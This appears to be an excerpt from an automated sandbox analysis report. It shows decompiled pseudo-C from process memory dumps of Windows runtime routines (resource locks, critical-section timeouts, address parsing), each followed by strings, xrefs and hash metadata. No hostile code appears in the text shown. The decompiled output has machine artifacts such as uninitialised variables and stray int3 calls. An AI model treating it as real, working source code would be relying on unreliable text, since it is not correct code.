                                                                                                                                                        				void* _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				signed int _t64;
                                                                                                                                                        				signed int _t71;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				intOrPtr _t78;
                                                                                                                                                        				signed int* _t79;
                                                                                                                                                        				void* _t85;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				signed int _t92;
                                                                                                                                                        				void* _t104;
                                                                                                                                                        				void* _t105;
                                                                                                                                                        
                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                        				_t32 =  *(_t64 + 0x28);
                                                                                                                                                        				_t71 = _t64 + 0x28;
                                                                                                                                                        				_push(_t92);
                                                                                                                                                        				if(_t32 < 0) {
                                                                                                                                                        					_t78 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                        						goto L3;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t32 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [ecx], eax");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L3:
                                                                                                                                                        					_push(_t86);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L4:
                                                                                                                                                        						__eflags = _t32;
                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t79 = _t64 + 0x24;
                                                                                                                                                        							_t71 = 1;
                                                                                                                                                        							asm("lock xadd [eax], ecx");
                                                                                                                                                        							_t32 =  *(_t64 + 0x28);
                                                                                                                                                        							_a4 = _t32;
                                                                                                                                                        							__eflags = _t32;
                                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                                        								L19:
                                                                                                                                                        								_t86 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024201c0;
                                                                                                                                                        									_push(_t92);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t37 = E0233F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                        									__eflags = _t37 - 0x102;
                                                                                                                                                        									if(_t37 != 0x102) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t71 =  *(_t92 + 4);
                                                                                                                                                        									_t85 =  *_t92;
                                                                                                                                                        									_t51 = E02384FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                        									_push(_t85);
                                                                                                                                                        									_push(_t51);
                                                                                                                                                        									E02393F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                        									E02393F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                        									_t86 = _t86 + 1;
                                                                                                                                                        									_t105 = _t104 + 0x28;
                                                                                                                                                        									__eflags = _t86 - 2;
                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                        										E023C217A(_t71, __eflags, _t64);
                                                                                                                                                        									}
                                                                                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(0x65);
                                                                                                                                                        									E02393F92();
                                                                                                                                                        									_t104 = _t105 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t37;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t37);
                                                                                                                                                        									E02383915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									_t40 =  *_t71;
                                                                                                                                                        									 *_t71 = 0;
                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                        										L1:
                                                                                                                                                        										_t42 = E02365384(_t92 + 0x24);
                                                                                                                                                        										if(_t42 != 0) {
                                                                                                                                                        											goto L31;
                                                                                                                                                        										} else {
                                                                                                                                                        											goto L2;
                                                                                                                                                        										}
                                                                                                                                                        									} else {
                                                                                                                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                        										_push( &_a4);
                                                                                                                                                        										_push(_t40);
                                                                                                                                                        										_t49 = E0233F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                        										__eflags = _t49;
                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                        											goto L1;
                                                                                                                                                        										} else {
                                                                                                                                                        											_push(_t49);
                                                                                                                                                        											E02383915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                        											L31:
                                                                                                                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        											_push( &_a4);
                                                                                                                                                        											_push(1);
                                                                                                                                                        											_t42 = E0233F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        											__eflags = _t42;
                                                                                                                                                        											if(__eflags >= 0) {
                                                                                                                                                        												L2:
                                                                                                                                                        												return _t42;
                                                                                                                                                        											} else {
                                                                                                                                                        												_push(_t42);
                                                                                                                                                        												E02383915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        												_push( &_a4);
                                                                                                                                                        												_push(1);
                                                                                                                                                        												_t42 = E0233F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        												__eflags = _t42;
                                                                                                                                                        												if(__eflags >= 0) {
                                                                                                                                                        													goto L2;
                                                                                                                                                        												} else {
                                                                                                                                                        													_push(_t42);
                                                                                                                                                        													_t45 = E02383915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                        													asm("int3");
                                                                                                                                                        													while(1) {
                                                                                                                                                        														_t74 = _t45;
                                                                                                                                                        														__eflags = _t45 - 1;
                                                                                                                                                        														if(_t45 != 1) {
                                                                                                                                                        															break;
                                                                                                                                                        														}
                                                                                                                                                        														_t86 = _t86 | 0xffffffff;
                                                                                                                                                        														_t45 = _t74;
                                                                                                                                                        														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                        														__eflags = _t45 - _t74;
                                                                                                                                                        														if(_t45 != _t74) {
                                                                                                                                                        															continue;
                                                                                                                                                        														} else {
                                                                                                                                                        															_t46 =  *[fs:0x18];
                                                                                                                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                        															return _t46;
                                                                                                                                                        														}
                                                                                                                                                        														goto L38;
                                                                                                                                                        													}
                                                                                                                                                        													E02365329(_t74, _t92);
                                                                                                                                                        													_push(1);
                                                                                                                                                        													_t48 = E023653A5(_t92);
                                                                                                                                                        													return _t48;
                                                                                                                                                        												}
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        								} else {
                                                                                                                                                        									_t32 =  *(_t64 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t71 =  *_t79;
                                                                                                                                                        								__eflags = _t71;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t57 = _t71;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t57 - _t71;
                                                                                                                                                        										if(_t57 == _t71) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t71 = _t57;
                                                                                                                                                        										__eflags = _t57;
                                                                                                                                                        										if(_t57 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t32 = _a4;
                                                                                                                                                        									__eflags = _t71;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L19;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L38;
                                                                                                                                                        					}
                                                                                                                                                        					_t71 = _t71 | 0xffffffff;
                                                                                                                                                        					_t32 = 0;
                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                        					__eflags = 0;
                                                                                                                                                        					if(0 != 0) {
                                                                                                                                                        						goto L4;
                                                                                                                                                        					} else {
                                                                                                                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L38:
                                                                                                                                                        			}



























                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023A22F4
                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023A22FC
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 023A2328
                                                                                                                                                        • RTL: Resource at %p, xrefs: 023A230B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E0236EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                        				signed int _v36;
                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                        				short _v66;
                                                                                                                                                        				char _v72;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                        				signed int _t44;
                                                                                                                                                        				void* _t46;
                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                        				signed char _t67;
                                                                                                                                                        				void* _t72;
                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                        				void* _t91;
                                                                                                                                                        				void* _t92;
                                                                                                                                                        				void* _t93;
                                                                                                                                                        
                                                                                                                                                        				_t80 = __edi;
                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                        				_t70 = __ecx;
                                                                                                                                                        				_t84 = _a4;
                                                                                                                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                        					E0235DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                        				}
                                                                                                                                                        				_push(0);
                                                                                                                                                        				__eflags = _t38 - 0xffffffff;
                                                                                                                                                        				if(_t38 == 0xffffffff) {
                                                                                                                                                        					_t39 =  *0x242793c; // 0x0
                                                                                                                                                        					_push(0);
                                                                                                                                                        					_push(_t84);
                                                                                                                                                        					_t40 = E023416C0(_t39);
                                                                                                                                                        				} else {
                                                                                                                                                        					_t40 = E0233F9D4(_t38);
                                                                                                                                                        				}
                                                                                                                                                        				_pop(_t85);
                                                                                                                                                        				__eflags = _t40;
                                                                                                                                                        				if(__eflags < 0) {
                                                                                                                                                        					_push(_t40);
                                                                                                                                                        					E02383915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                        					asm("int3");
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L21:
                                                                                                                                                        						_t76 =  *[fs:0x18];
                                                                                                                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                        							_v66 = 0x1722;
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_t76 =  &_v72;
                                                                                                                                                        							_push( &_v72);
                                                                                                                                                        							_v28 = _t85;
                                                                                                                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(0x10);
                                                                                                                                                        							_push(0x20402);
                                                                                                                                                        							E023401A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_t43 = _v8;
                                                                                                                                                        							_push(_t80);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							__eflags = _t43 - 0xffffffff;
                                                                                                                                                        							if(_t43 == 0xffffffff) {
                                                                                                                                                        								_t71 =  *0x242793c; // 0x0
                                                                                                                                                        								_push(_t85);
                                                                                                                                                        								_t44 = E02341F28(_t71);
                                                                                                                                                        							} else {
                                                                                                                                                        								_t44 = E0233F8CC(_t43);
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t44 - 0x102;
                                                                                                                                                        							if(_t44 != 0x102) {
                                                                                                                                                        								__eflags = _t44;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t44);
                                                                                                                                                        									E02383915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									E023C2306(_t85);
                                                                                                                                                        									__eflags = _t67 & 0x00000002;
                                                                                                                                                        									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                        										_t7 = _t67 + 2; // 0x4
                                                                                                                                                        										_t72 = _t7;
                                                                                                                                                        										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                        										__eflags = _t67 - _t67;
                                                                                                                                                        										if(_t67 == _t67) {
                                                                                                                                                        											E0236EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									__eflags = _v24;
                                                                                                                                                        									if(_v24 != 0) {
                                                                                                                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                        									}
                                                                                                                                                        									return 2;
                                                                                                                                                        								}
                                                                                                                                                        								goto L36;
                                                                                                                                                        							}
                                                                                                                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                        							_push(_t67);
                                                                                                                                                        							_t46 = E02384FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                        							_push(_t77);
                                                                                                                                                        							E02393F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                        							_t48 =  *_t85;
                                                                                                                                                        							_t92 = _t91 + 0x18;
                                                                                                                                                        							__eflags = _t48 - 0xffffffff;
                                                                                                                                                        							if(_t48 == 0xffffffff) {
                                                                                                                                                        								_t49 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(_t49);
                                                                                                                                                        							_t50 = _v12;
                                                                                                                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                        							_push(_t85);
                                                                                                                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                        							E02393F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                        							_t53 =  *_t85;
                                                                                                                                                        							_t93 = _t92 + 0x20;
                                                                                                                                                        							_t67 = _t67 + 1;
                                                                                                                                                        							__eflags = _t53 - 0xffffffff;
                                                                                                                                                        							if(_t53 != 0xffffffff) {
                                                                                                                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t67 - 2;
                                                                                                                                                        							if(_t67 > 2) {
                                                                                                                                                        								__eflags = _t85 - 0x24220c0;
                                                                                                                                                        								if(_t85 != 0x24220c0) {
                                                                                                                                                        									_t76 = _a4;
                                                                                                                                                        									__eflags = _a4 - _a8;
                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                        										E023C217A(_t71, __eflags, _t85);
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							_push("RTL: Re-Waiting\n");
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push(0x65);
                                                                                                                                                        							_a8 = _a4;
                                                                                                                                                        							E02393F92();
                                                                                                                                                        							_t91 = _t93 + 0xc;
                                                                                                                                                        							__eflags =  *0x7ffe0382;
                                                                                                                                                        							if( *0x7ffe0382 != 0) {
                                                                                                                                                        								goto L21;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L36;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t40;
                                                                                                                                                        				}
                                                                                                                                                        				L36:
                                                                                                                                                        			}


































                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 023A248D
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 023A24FA
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023A24BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: 1d9088f5941b6002f6809935460dbb7acaf62a8d1a8906836ab1ebfdaa9f2104
                                                                                                                                                        • Instruction ID: 85d037a5c43cbc1c3ce3b7b58434787638f7dad448337174de31484e8d3913cb
                                                                                                                                                        • Opcode Fuzzy Hash: 1d9088f5941b6002f6809935460dbb7acaf62a8d1a8906836ab1ebfdaa9f2104
                                                                                                                                                        • Instruction Fuzzy Hash: 5B41EFB0A00304ABDB34EB68CC98F6B77EAEF45720F208655F9599B6C1D734E941CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0237FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _t105;
                                                                                                                                                        				void* _t110;
                                                                                                                                                        				char _t114;
                                                                                                                                                        				short _t115;
                                                                                                                                                        				void* _t118;
                                                                                                                                                        				signed short* _t119;
                                                                                                                                                        				short _t120;
                                                                                                                                                        				char _t122;
                                                                                                                                                        				void* _t127;
                                                                                                                                                        				void* _t130;
                                                                                                                                                        				signed int _t136;
                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                        				signed int _t158;
                                                                                                                                                        				signed short* _t164;
                                                                                                                                                        				signed int _t167;
                                                                                                                                                        				void* _t170;
                                                                                                                                                        
                                                                                                                                                        				_t158 = 0;
                                                                                                                                                        				_t164 = _a4;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				_v24 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_t136 = 0;
                                                                                                                                                        				while(1) {
                                                                                                                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                        					if(_t167 == _t158) {
                                                                                                                                                        						break;
                                                                                                                                                        					}
                                                                                                                                                        					_t118 = _v20 - _t158;
                                                                                                                                                        					if(_t118 == 0) {
                                                                                                                                                        						if(_t167 == 0x3a) {
                                                                                                                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                        								break;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t119 =  &(_t164[1]);
                                                                                                                                                        								if( *_t119 != _t167) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_t143 = 2;
                                                                                                                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                        								_v28 = 1;
                                                                                                                                                        								_v8 = _t143;
                                                                                                                                                        								_t136 = _t136 + 1;
                                                                                                                                                        								L47:
                                                                                                                                                        								_t164 = _t119;
                                                                                                                                                        								_v20 = _t143;
                                                                                                                                                        								L14:
                                                                                                                                                        								if(_v24 == _t158) {
                                                                                                                                                        									L19:
                                                                                                                                                        									_t164 =  &(_t164[1]);
                                                                                                                                                        									_t158 = 0;
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v12 == _t158) {
                                                                                                                                                        									if(_v16 > 4) {
                                                                                                                                                        										L29:
                                                                                                                                                        										return 0xc000000d;
                                                                                                                                                        									}
                                                                                                                                                        									_t120 = E0237EE02(_v24, _t158, 0x10);
                                                                                                                                                        									_t170 = _t170 + 0xc;
                                                                                                                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                        									_t136 = _t136 + 1;
                                                                                                                                                        									goto L19;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v16 > 3) {
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								_t122 = E0237EE02(_v24, _t158, 0xa);
                                                                                                                                                        								_t170 = _t170 + 0xc;
                                                                                                                                                        								if(_t122 > 0xff) {
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                        								goto L19;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						L21:
                                                                                                                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                        							break;
                                                                                                                                                        						} else {
                                                                                                                                                        							if(E0237685D(_t167, 4) == 0) {
                                                                                                                                                        								if(E0237685D(_t167, 0x80) != 0) {
                                                                                                                                                        									if(_v12 > 0) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t127 = 1;
                                                                                                                                                        									_a7 = 1;
                                                                                                                                                        									_v24 = _t164;
                                                                                                                                                        									_v20 = 1;
                                                                                                                                                        									_v16 = 1;
                                                                                                                                                        									L36:
                                                                                                                                                        									if(_v20 == _t127) {
                                                                                                                                                        										goto L19;
                                                                                                                                                        									}
                                                                                                                                                        									_t158 = 0;
                                                                                                                                                        									goto L14;
                                                                                                                                                        								}
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							_a7 = 0;
                                                                                                                                                        							_v24 = _t164;
                                                                                                                                                        							_v20 = 1;
                                                                                                                                                        							_v16 = 1;
                                                                                                                                                        							goto L19;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t130 = _t118 - 1;
                                                                                                                                                        					if(_t130 != 0) {
                                                                                                                                                        						if(_t130 == 1) {
                                                                                                                                                        							goto L21;
                                                                                                                                                        						}
                                                                                                                                                        						_t127 = 1;
                                                                                                                                                        						goto L36;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t167 >= 0x80) {
                                                                                                                                                        						L7:
                                                                                                                                                        						if(_t167 == 0x3a) {
                                                                                                                                                        							_t158 = 0;
                                                                                                                                                        							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                        								break;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t119 =  &(_t164[1]);
                                                                                                                                                        								if( *_t119 != _t167) {
                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                        									L13:
                                                                                                                                                        									_v20 = _t158;
                                                                                                                                                        									goto L14;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v28 != 0) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_v28 = _v8 + 1;
                                                                                                                                                        								_t143 = 2;
                                                                                                                                                        								_v8 = _v8 + _t143;
                                                                                                                                                        								goto L47;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                        							break;
                                                                                                                                                        						} else {
                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                        							_t158 = 0;
                                                                                                                                                        							goto L13;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					if(E0237685D(_t167, 4) != 0) {
                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                        						goto L19;
                                                                                                                                                        					}
                                                                                                                                                        					if(E0237685D(_t167, 0x80) != 0) {
                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                        						if(_v12 > 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						_a7 = 1;
                                                                                                                                                        						goto L19;
                                                                                                                                                        					}
                                                                                                                                                        					goto L7;
                                                                                                                                                        				}
                                                                                                                                                        				 *_a8 = _t164;
                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                        					if(_v12 != 3) {
                                                                                                                                                        						goto L29;
                                                                                                                                                        					}
                                                                                                                                                        					_v8 = _v8 + 1;
                                                                                                                                                        				}
                                                                                                                                                        				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                        					if(_v20 != 1) {
                                                                                                                                                        						if(_v20 != 2) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                        						L65:
                                                                                                                                                        						_t105 = _v28;
                                                                                                                                                        						if(_t105 != 0) {
                                                                                                                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                        							E02358980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                        							_t110 = 8;
                                                                                                                                                        							E0234DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                        						}
                                                                                                                                                        						return 0;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                        						if(_v16 > 3) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						_t114 = E0237EE02(_v24, 0, 0xa);
                                                                                                                                                        						_t170 = _t170 + 0xc;
                                                                                                                                                        						if(_t114 > 0xff) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
